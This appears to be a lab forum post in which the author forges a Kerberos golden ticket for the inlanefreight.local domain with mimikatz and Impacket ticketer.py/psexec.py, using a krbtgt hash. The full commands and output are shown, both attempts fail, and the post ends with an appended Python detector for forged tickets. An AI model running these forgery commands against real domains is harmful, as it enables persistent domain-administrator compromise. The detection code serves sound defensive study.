From Windows:
mimikatz # kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt
User : Administrator
Domain : inlanefreight.local (INLANEFREIGHT)
SID : S-1-5-21-2974783224-3764228556-2640795941
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: c0231bd8a4a4de92fca0760c0ba9e7a6 - rc4_hmac_nt
Lifetime : 12/28/2023 10:32:23 AM ; 12/25/2033 10:32:23 AM ; 12/25/2033 10:32:23 AM
→ Ticket : ** Pass The Ticket **
- PAC generated
- PAC signed
- EncTicketPart generated
- EncTicketPart encrypted
- KrbCred generated
Golden ticket for ‘Administrator @ inlanefreight.local’ successfully submitted for current session
PS C:\tools> klist
Current LogonId is 0:0x83356
Cached Tickets: (1)
#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 → forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 → PRIMARY
Kdc Called:
PS C:\tools> Enter-PSSession dc01
Enter-PSSession : Connecting to remote server dc01 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession dc01
    + CategoryInfo : InvalidArgument: (dc01:String) [Enter-PSSession], PSRemotingTransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed
PS C:\tools> klist
Current LogonId is 0:0x83356
Cached Tickets: (3)
#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 → forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 → DELEGATION
Kdc Called: DC01.INLANEFREIGHT.LOCAL
#1> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 → forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 → PRIMARY
Kdc Called:
#2> Client: Administrator @ inlanefreight.local
Server: HTTP/dc01 @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 → forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC01.INLANEFREIGHT.LOCAL
From Linux:
└─# ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-2974783224-3764228556-2640795941 -domain inlanefreight.local -user-id 500 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for inlanefreight.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
┌──(root💀kali)-[~]
└─# export KRB5CCNAME=./Administrator.ccache
┌──(root💀kali)-[~]
└─# psexec.py -k -no-pass dc01.inlanefreight.local
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
Which a Google search points to here:
Question: is anyone able to solve this or should Support provide the AES256 key for the KRBTGT account so that we can solve the lab?
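A defender-side reading of the klist output above, as an added example that is not part of the original post: it parses klist text and flags cached tickets whose lifetime, encryption type or missing "Kdc Called" value set them apart from the KDC-issued entries. The function names are hypothetical, the sample is abridged from the post, and the 10-hour limit assumes the default domain Kerberos policy.

```python
import re
from datetime import datetime, timedelta

# Assumption: default domain Kerberos policy (10-hour maximum ticket lifetime).
MAX_LIFETIME = timedelta(hours=10)
# Two entries abridged from the klist output in the post above.
SAMPLE = """\
#0> Client: Administrator @ inlanefreight.local
    Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
    KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
    Start Time: 12/28/2023 10:33:07 (local)
    End Time: 12/28/2023 20:33:07 (local)
    Kdc Called: DC01.INLANEFREIGHT.LOCAL
#1> Client: Administrator @ inlanefreight.local
    Server: krbtgt/inlanefreight.local @ inlanefreight.local
    KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
    Start Time: 12/28/2023 10:32:23 (local)
    End Time: 12/25/2033 10:32:23 (local)
    Kdc Called:
"""

def parse_klist(text):
    """Split klist output into one dict of 'Field: value' pairs per cached ticket."""
    tickets = []
    for block in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.strip().partition(":")
            if sep:
                fields[key.strip()] = value.strip()
        tickets.append(fields)
    return tickets

def when(value):
    return datetime.strptime(value.replace(" (local)", ""), "%m/%d/%Y %H:%M:%S")

def findings(ticket):
    """Return the heuristic reasons a cached ticket does not look KDC-issued."""
    reasons = []
    if when(ticket["End Time"]) - when(ticket["Start Time"]) > MAX_LIFETIME:
        reasons.append("lifetime exceeds domain policy")
    if ticket["Server"].lower().startswith("krbtgt/") and "RC4" in ticket["KerbTicket Encryption Type"]:
        reasons.append("RC4 TGT")
    if not ticket["Kdc Called"]:
        reasons.append("no issuing KDC recorded")
    return reasons

def audit(text):
    return {i: r for i, t in enumerate(parse_klist(text)) if (r := findings(t))}
```

`audit(SAMPLE)` reports only entry #1, the ten-year RC4 TGT with an empty "Kdc Called" field; the ten-hour AES ticket from DC01 passes all three checks.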